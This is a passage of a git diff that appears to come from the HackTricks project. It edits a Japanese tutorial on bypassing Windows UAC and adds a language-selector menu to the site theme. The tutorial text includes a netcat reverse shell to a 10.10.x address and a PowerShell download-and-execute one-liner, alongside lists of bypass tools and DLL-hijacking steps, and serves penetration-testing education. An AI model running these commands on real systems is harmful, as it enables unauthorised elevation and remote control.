+バイナリの_**Manifest**_を確認するには、Sysinternalsのツール_**sigcheck.exe**_を使用できます。また、_Process Explorer_や_Sysinternals_の_**Process Monitor**_を使用してプロセスの**インテグリティレベル**を確認できます。
 
 ### UACの確認
 
@@ -46,9 +46,9 @@ REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
 EnableLUA    REG_DWORD    0x1
 ```
-もしそれが **`1`** であれば、UACは **有効** です。もしそれが **`0`** であるか、**存在しない** のであれば、UACは **無効** です。
+もし**`1`**であれば、UACは**有効**です。もし**`0`**であるか、**存在しない**場合は、UACは**無効**です。
 
-次に、**どのレベル** が設定されているかを確認します：
+次に、**どのレベル**が設定されているかを確認します：
 ```
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
 
@@ -56,24 +56,24 @@ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
 ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
 - **`0`** の場合、UACはプロンプトを表示しません（**無効**のように）
-- **`1`** の場合、管理者は**ユーザー名とパスワード**を要求されて、バイナリを高い権限で実行します（セキュアデスクトップ上で）
+- **`1`** の場合、管理者は**ユーザー名とパスワード**を求められ、高権限でバイナリを実行します（セキュアデスクトップ上で）
 - **`2`** の場合（**常に通知**）、UACは管理者が高い権限で何かを実行しようとするたびに常に確認を求めます（セキュアデスクトップ上で）
-- **`3`** の場合、`1` と同様ですが、セキュアデスクトップ上で必要ありません
-- **`4`** の場合、`2` と同様ですが、セキュアデスクトップ上で必要ありません
+- **`3`** の場合、`1` と同様ですが、セキュアデスクトップ上での必要はありません
+- **`4`** の場合、`2` と同様ですが、セキュアデスクトップ上での必要はありません
 - **`5`** の場合（**デフォルト**）、非Windowsバイナリを高い権限で実行するために管理者に確認を求めます
 
 次に、**`LocalAccountTokenFilterPolicy`** の値を確認する必要があります。\
-値が **`0`** の場合、**RID 500** ユーザー（**ビルトイン管理者**）のみが**UACなしで管理タスク**を実行でき、`1` の場合は、**「Administrators」** グループ内のすべてのアカウントがそれを実行できます。
+値が **`0`** の場合、**RID 500** ユーザー（**ビルトイン管理者**）のみがUACなしで**管理タスク**を実行できます。`1` の場合、**「Administrators」** グループ内のすべてのアカウントがそれを実行できます。
 
 最後に、キー **`FilterAdministratorToken`** の値を確認します。\
-**`0`**（デフォルト）の場合、**ビルトイン管理者アカウントは**リモート管理タスクを実行でき、**`1`** の場合、ビルトイン管理者アカウントは**リモート管理タスクを実行できません**が、`LocalAccountTokenFilterPolicy` が `1` に設定されている場合を除きます。
+**`0`**（デフォルト）の場合、**ビルトイン管理者アカウントは**リモート管理タスクを実行できます。`1` の場合、ビルトインアカウント管理者は**リモート管理タスクを実行できません**が、`LocalAccountTokenFilterPolicy` が `1` に設定されている場合を除きます。
 
 #### 概要
 
 - `EnableLUA=0` または **存在しない**場合、**誰に対してもUACなし**
-- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=1` の場合、誰に対してもUACなし**
-- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0` かつ `FilterAdministratorToken=0` の場合、RID 500（ビルトイン管理者）に対してUACなし**
-- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0` かつ `FilterAdministratorToken=1` の場合、全員に対してUACあり**
+- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=1`** の場合、誰に対してもUACなし
+- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0`** かつ `FilterAdministratorToken=0` の場合、RID 500（ビルトイン管理者）に対してUACなし
+- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0`** かつ `FilterAdministratorToken=1` の場合、全員に対してUACあり
 
 このすべての情報は、**metasploit** モジュール `post/windows/gather/win_privs` を使用して収集できます。
 
@@ -85,7 +85,7 @@ whoami /groups | findstr Level
 ## UACバイパス
 
 > [!NOTE]
-> 被害者にグラフィカルアクセスがある場合、UACバイパスは簡単で、UACプロンプトが表示されたときに「はい」をクリックするだけです。
+> 被害者にグラフィカルアクセスがある場合、UACバイパスは簡単で、UASプロンプトが表示されたときに「はい」をクリックするだけです。
 
 UACバイパスは以下の状況で必要です: **UACが有効で、プロセスが中程度の整合性コンテキストで実行されており、ユーザーが管理者グループに属している場合**。
 
@@ -93,7 +93,7 @@ UACが最高のセキュリティレベル（常に）に設定されている
 
 ### UAC無効
 
-UACがすでに無効になっている場合（`ConsentPromptBehaviorAdmin`が**`0`**）、次のようなもので**管理者権限でリバースシェルを実行**できます:
+UACがすでに無効になっている場合（`ConsentPromptBehaviorAdmin`が**`0`**）、**管理者権限でリバースシェルを実行することができます**（高整合性レベル）次のようなものを使用して:
 ```bash
 #Put your reverse shell instead of "calc.exe"
 Start-Process powershell -Verb runAs "calc.exe"
@@ -104,7 +104,7 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10
 - [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
 - [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
 
-### **非常に** 基本的なUAC "バイパス" (フルファイルシステムアクセス)
+### **非常に** 基本的なUAC "バイパス"（フルファイルシステムアクセス）
 
 管理者グループに属するユーザーのシェルを持っている場合、**C$** 共有をSMB（ファイルシステム）経由で新しいディスクにマウントすることができ、**ファイルシステム内のすべてにアクセスできます**（管理者のホームフォルダも含む）。
 
@@ -139,8 +139,8 @@ runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.w
 
 ### UAC バイパスエクスプロイト
 
-[**UACME**](https://github.com/hfiref0x/UACME) は、いくつかの UAC バイパスエクスプロイトの **コンパイル** です。**UACME を Visual Studio または msbuild を使用してコンパイルする必要があります**。コンパイルにより、いくつかの実行可能ファイル（例: `Source\Akagi\outout\x64\Debug\Akagi.exe`）が作成されます。**どれが必要かを知っておく必要があります。**\
-**注意が必要です**。なぜなら、いくつかのバイパスは、**他のプログラムを促す** ことがあり、**ユーザー** に何かが起こっていることを **警告** します。
+[**UACME**](https://github.com/hfiref0x/UACME) は、いくつかの UAC バイパスエクスプロイトの **コンパイル** です。**UACME を Visual Studio または msbuild を使用してコンパイルする必要があります**。コンパイルにより、いくつかの実行可能ファイル（例えば `Source\Akagi\outout\x64\Debug\Akagi.exe`）が作成されます。**どれが必要かを知っておく必要があります。**\
+**注意が必要** です。なぜなら、いくつかのバイパスは **他のプログラムを促す** ことがあり、**ユーザー** に何かが起こっていることを **警告** します。
 
 UACME には、各技術が動作し始めた **ビルドバージョン** があります。あなたのバージョンに影響を与える技術を検索できます：
 ```
@@ -164,20 +164,20 @@ Major  Minor  Build  Revision
 
 ### GUIを使用したUACバイパス
 
-**GUIにアクセスできる場合、UACプロンプトが表示されたときにそれを受け入れるだけで済みます**。実際にはバイパスは必要ありません。したがって、GUIにアクセスすることでUACをバイパスできます。
+**GUIにアクセスできる場合は、UACプロンプトが表示されたときにそれを受け入れるだけで済みます**。実際にはバイパスは必要ありません。したがって、GUIにアクセスすることでUACをバイパスできます。
 
-さらに、誰かが使用していたGUIセッション（おそらくRDP経由）を取得した場合、**管理者として実行されるいくつかのツール**があり、そこから**cmd**を**管理者として**直接実行できる可能性があります。再度UACによるプロンプトなしで、[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)のように。これは少し**ステルス**かもしれません。
+さらに、誰かが使用していたGUIセッション（おそらくRDP経由）を取得した場合、**管理者として実行されるいくつかのツール**があり、そこから**cmd**を例えば**管理者として**直接実行でき、再度UACによるプロンプトが表示されることはありません。 [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。これは少し**ステルス**になるかもしれません。
 
 ### 騒がしいブルートフォースUACバイパス
 
-騒がしいことを気にしない場合は、常に[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)のようなものを**実行することができます**。これは**ユーザーが受け入れるまで権限を昇格させるように要求します**。
+騒がしいことを気にしないのであれば、常に[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)のようなものを**実行することができます**。これは**ユーザーが受け入れるまで権限を昇格させるように要求します**。
 
 ### 自分自身のバイパス - 基本的なUACバイパス手法
 
-**UACME**を見てみると、**ほとんどのUACバイパスはDll Hijackingの脆弱性を悪用しています**（主に悪意のあるdllを_C:\Windows\System32_に書き込むこと）。[Dll Hijackingの脆弱性を見つける方法を学ぶには、これを読んでください](../windows-local-privilege-escalation/dll-hijacking.md)。
+**UACME**を見てみると、**ほとんどのUACバイパスはDLLハイジャックの脆弱性を悪用しています**（主に悪意のあるdllを_C:\Windows\System32_に書き込むこと）。 [DLLハイジャックの脆弱性を見つける方法を学ぶには、これをお読みください](../windows-local-privilege-escalation/dll-hijacking.md)。
 
 1. **自動昇格**するバイナリを見つけます（実行時に高い整合性レベルで実行されることを確認します）。
-2. procmonを使用して、**DLL Hijacking**に脆弱な"**NAME NOT FOUND**"イベントを見つけます。
+2. procmonを使用して、**DLLハイジャック**に脆弱な**"NAME NOT FOUND"**イベントを見つけます。
 3. おそらく、**書き込み権限がない**いくつかの**保護されたパス**（C:\Windows\System32など）内にDLLを**書き込む**必要があります。これをバイパスするには：
    1. **wusa.exe**：Windows 7、8、8.1。保護されたパス内にCABファイルの内容を抽出することを許可します（このツールは高い整合性レベルから実行されるため）。
    2. **IFileOperation**：Windows 10。
@@ -185,6 +185,6 @@ Major  Minor  Build  Revision
 
 ### 別のUACバイパス技術
 
-**autoElevatedバイナリ**が**実行される**ための**バイナリ**または**コマンド**の**名前/パス**を**レジストリ**から**読み取ろうとする**のを監視することに基づいています（このバイナリが**HKCU**内でこの情報を検索する場合、これはより興味深いです）。
+**autoElevatedバイナリ**が**実行される**ための**バイナリ**または**コマンド**の**名前/パス**を**レジストリ**から**読み取ろうとする**のを監視することに基づいています（これは、バイナリが**HKCU**内でこの情報を検索する場合により興味深いです）。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/theme/book.js b/theme/book.js
index 1c8d77287..ccba50404 100644
--- a/theme/book.js
+++ b/theme/book.js
@@ -590,6 +590,61 @@ function playground_text(playground, hidden = true) {
     });
 })();
 
+
+(function menubarLanguage() {
+    var menubarLanguageToggleButton = document.getElementById('menubar-languages-toggle');
+    var menubarLanguagePopup = document.getElementById('menubar-languages-popup');
+    var languageButtons = menubarLanguagePopup.querySelectorAll('.menu-bar-link');
+
+    function showLanguage() {
+        menubarLanguagePopup.style.display = 'flex';
+        menubarLanguageToggleButton.setAttribute('aria-expanded', true);
+    }
+
+    function hideLanguage() {
+        menubarLanguagePopup.style.display = 'none';
+        menubarLanguageToggleButton.setAttribute('aria-expanded', false);
+        menubarLanguageToggleButton.focus();
+    }
+
+    menubarLanguageToggleButton.addEventListener('click', function () {
+        if (menubarLanguagePopup.style.display === 'flex') {
+            hideLanguage();
+        } else {
+            showLanguage();
+        }
+    });
+
+    menubarLanguagePopup.addEventListener('focusout', function(e) {
+        // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below)
+        if (!!e.relatedTarget && !menubarLanguageToggleButton.contains(e.relatedTarget) && !menubarLanguagePopup.contains(e.relatedTarget)) {
+            hideLanguage();
+        }
+    });
+
+    // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628
+    document.addEventListener('click', function(e) {
+        if (menubarLanguagePopup.style.display === 'block' && !menubarLanguageToggleButton.contains(e.target) && !menubarLanguagePopup.contains(e.target)) {
+            hideLanguage();
+        }
+    });
+    
+    languageButtons.forEach((btn) => {
+        btn.addEventListener('click', function(e) {
+            const regex = /(?:(?:\/)+(?<lang>[a-z]{2}(?=\/|$)))?(?<path>(?:\/)*.*)?/g
+            var match = regex.exec(window.location.pathname)
+          
+            var path = match.groups.path
+            console.log(`Path: ${path} ${typeof path}`)
+          
+            const lang = match.groups.lang
+            console.log(`Lang: ${lang}`)
+            
+            window.location = `/${e.target.id}${path}${window.location.hash}`
+        });
+    })
+})();
+
 (function chapterNavigation() {
     document.addEventListener('keydown', function (e) {
         if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; }
diff --git a/theme/css/chrome.css b/theme/css/chrome.css
index 8cbda7c69..ead7ee881 100644
--- a/theme/css/chrome.css
+++ b/theme/css/chrome.css
@@ -83,6 +83,13 @@ body.sidebar-visible #menu-bar {
     }
 }
 
+.right-buttons .icons {
+    display: flex;
+    flex-direction: row;
+    flex-wrap: wrap;
+    column-gap: 0.5rem;
+}
+
 .icon-button {
     border: none;
     background: var(--bg);
@@ -139,10 +146,13 @@ body.sidebar-visible #menu-bar {
 
 /* Collapse Menu Popup */
 
+#menubar-collapse-toggle {
+    position: relative;
+}
 #menubar-collapse-popup {
     position: absolute;
-    right: 30px;
-    top: var(--menu-bar-height);
+    right: 0px;
+    top: 35px;
     z-index: 105;
     border-radius: 5px;
     font-size: 14px;
@@ -172,6 +182,44 @@ body.sidebar-visible #menu-bar {
     background-color: var(--theme-hover);
 }
 
+/* Languages Menu Popup */
+#menubar-languages-toggle {
+    position: relative;
+}
+
+#menubar-languages-popup {
+    position: absolute;
+    right: 0px;
+    top: 35px;
+    z-index: 105;
+    border-radius: 5px;
+    font-size: 14px;
+    color: var(--fg);
+    background: var(--bg);
+    border: 1px solid var(--table-border-color);
+    margin: 0;
+    padding: 0px;
+    display: none;
+    flex-direction: column;
+    max-height: 300px;
+    width: 150px;
+    overflow: scroll;
+}
+#menubar-languages-popup .menu-bar-link {
+    border: 0;
+    margin: 0;
+    padding: 8px 20px;
+    line-height: 25px;
+    white-space: nowrap;
+    text-align: start;
+    cursor: pointer;
+    color: inherit;
+    background: inherit;
+    font-size: inherit;
+}
+#menubar-languages-popup .menu-bar-link:hover {
+    background-color: var(--theme-hover);
+}
 
 .left-buttons {
     display: flex;
diff --git a/theme/index.hbs b/theme/index.hbs
index ecd2565f4..95c964391 100644
--- a/theme/index.hbs
+++ b/theme/index.hbs
@@ -144,34 +144,60 @@
 
                         <div class="right-buttons">
                             <div id="menubar-collapse">
-                            <a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
-                                Hacktricks Training
-                            </a>
-                            <a class="menu-bar-link" href="https://twitter.com/hacktricks_live" target="_blank">
-                                Twitter
-                            </a>
-                            <a class="menu-bar-link" href="https://www.linkedin.com/company/hacktricks" target="_blank">
-                                Linkedin
-                            </a>
-                            <a class="menu-bar-link" href="https://github.com/sponsors/carlospolop" target="_blank">
-                                Sponsor
-                            </a>
-                            </div>
-                            <button id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
-                                <i class="fa fa-ellipsis-h"></i>
-                            </button>
-                            <div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
-                                <a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">Hacktricks Training</a>
-                                <a href="https://twitter.com/hacktricks_live" target="_blank" role="menuitem" class="menu-bar-link">Twitter</a>
-                                <a href="https://www.linkedin.com/company/hacktricks" target="_blank" role="menuitem" class="menu-bar-link">Linkedin</a>
-                                <a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>
+                                <a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
+                                    Hacktricks Training
+                                </a>
+                                <a class="menu-bar-link" href="https://twitter.com/hacktricks_live" target="_blank">
+                                    Twitter
+                                </a>
+                                <a class="menu-bar-link" href="https://www.linkedin.com/company/hacktricks" target="_blank">
+                                    Linkedin
+                                </a>
+                                <a class="menu-bar-link" href="https://github.com/sponsors/carlospolop" target="_blank">
+                                    Sponsor
+                                </a>
                             </div>
+                            <div class="icons">
+                                <div id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
+                                    <i class="fa fa-ellipsis-h"></i>
+                                    <div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
+                                        <a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">Hacktricks Training</a>
+                                        <a href="https://twitter.com/hacktricks_live" target="_blank" role="menuitem" class="menu-bar-link">Twitter</a>
+                                        <a href="https://www.linkedin.com/company/hacktricks" target="_blank" role="menuitem" class="menu-bar-link">Linkedin</a>
+                                        <a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>
+                                    </div>
+                                </div>
 
-                            {{#if search_enabled}}
-                            <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
-                                <i class="fa fa-search"></i>
-                            </button>
-                            {{/if}}
+                                {{#if search_enabled}}
+                                <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
+                                    <i class="fa fa-search"></i>
+                                </button>
+                                {{/if}}
+
+                                <div id="menubar-languages-toggle" class="icon-button" type="button" title="Translations" aria-label="Toggle Tanslations" aria-expanded="false" aria-controls="translations">
+                                    <i class="fa fa-globe"></i>
+                                    
+                                    <div id="menubar-languages-popup" class="menubar-languages-popup" aria-label="Language menu" role="language menu">
+                                        <button id="en" role="menuitem" class="menu-bar-link">English</button>
+                                        <button id="es" role="menuitem" class="menu-bar-link">Spanish</button>
+                                        <button id="fr" role="menuitem" class="menu-bar-link">French</button>
+                                        <button id="de" role="menuitem" class="menu-bar-link">German</button>
+                                        <button id="el" role="menuitem" class="menu-bar-link">Greek</button>
+                                        <button id="hi" role="menuitem" class="menu-bar-link">Hindi</button>
+                                        <button id="it" role="menuitem" class="menu-bar-link">Italian</button>
+                                        <button id="ja" role="menuitem" class="menu-bar-link">Japanese</button>
+                                        <button id="ko" role="menuitem" class="menu-bar-link">Korean</button>
+                                        <button id="pl" role="menuitem" class="menu-bar-link">Polish</button>
+                                        <button id="pt" role="menuitem" class="menu-bar-link">Portuguese</button>
+                                        <button id="sr" role="menuitem" class="menu-bar-link">Serbian</button>
+                                        <button id="sw" role="menuitem" class="menu-bar-link">Swahili</button>
+                                        <button id="tr" role="menuitem" class="menu-bar-link">Turkish</button>
+                                        <button id="uk" role="menuitem" class="menu-bar-link">Ukrainian</button>
+                                        <button id="af" role="menuitem" class="menu-bar-link">Afrikaans</button>
+                                        <button id="zh" role="menuitem" class="menu-bar-link">Chinese</button>
+                                    </div>
+                                </div>
+                            </div>
 
                             {{#if print_enable}}
                             <a href="{{ path_to_root }}print.html" title="Print this book" aria-label="Print this book">
diff --git a/theme/sponsor.js b/theme/sponsor.js
index 65f157364..5b3f66804 100644
--- a/theme/sponsor.js
+++ b/theme/sponsor.js
@@ -19,13 +19,11 @@
     try {
       const response = await fetch(url, { method: "GET" })
       if (!response.ok) {
-        console.log(response)
         throw new Error(`Response status: ${response.status}`)
       }
 
       const json = await response.json()
       var sponsor = json.sponsor
-      console.log("boop", sponsor)
       sponsorImg.src = sponsor.image_url
       sponsorTitle.textContent = sponsor.name
       sponsorDescription.innerHTML = sponsor.description